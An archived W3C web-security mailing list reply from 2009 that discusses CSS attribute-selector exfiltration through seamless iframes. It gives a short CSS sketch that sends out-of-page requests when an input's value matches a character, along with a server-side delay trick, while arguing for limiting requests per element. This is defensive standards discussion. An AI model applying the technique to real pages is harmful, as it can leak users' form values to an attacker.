W3C home > Mailing lists > Public > public-web-security@w3.org > December 2009

Re: Seamless iframes + CSS3 selectors = bad idea

From: gaz Heyes <gazheyes@gmail.com>
Date: Tue, 8 Dec 2009 10:20:35 +0000
Message-ID: <252dd75b0912080220n7695f087rb19fdd0b6b82f261@mail.gmail.com>
To: Adam Barth <w3c@adambarth.com>
Cc: Daniel Glazman <daniel@glazman.org>, Thomas Roessler <tlr@w3.org>, public-web-security@w3.org
2009/12/8 Adam Barth <w3c@adambarth.com>

> I doubt that limiting the external requests is a viable approach.  I'm
> not aware of any success stories about preventing exfiltration in the
> web platform.  The platform just has way too many ways to send data.
>

Actually it's a good idea but I wasn't clear. The current browsers do this
now (apart from safari) you see you can't have a background image on the
same element multiple times. If I wanted to conduct this attack in Firefox
for example I'd have to create different rules for each request I make
otherwise the rule gets overwritten by the next. I like to talk with code
this will explain better:-

input[value*="x"]#element {
 background:url(one request);
}

input[value*="y"]#element {
  -moz-binding:url(second request);
}

The rules overwrite each other if you use the same css property. I get round
this in Safari by using a sleep timer on the server side request, so it
waits for the fake images to load thus allowing the same element to have the
same rules multiple times. If you limit the amount of requests you can make
per element than you limit the amount of data you can gather.
Received on Tuesday, 8 December 2009 10:21:15 GMT

This archive was generated by hypermail 2.2.0+W3C-0.50 : Sunday, 19 December 2010 00:16:01 GMT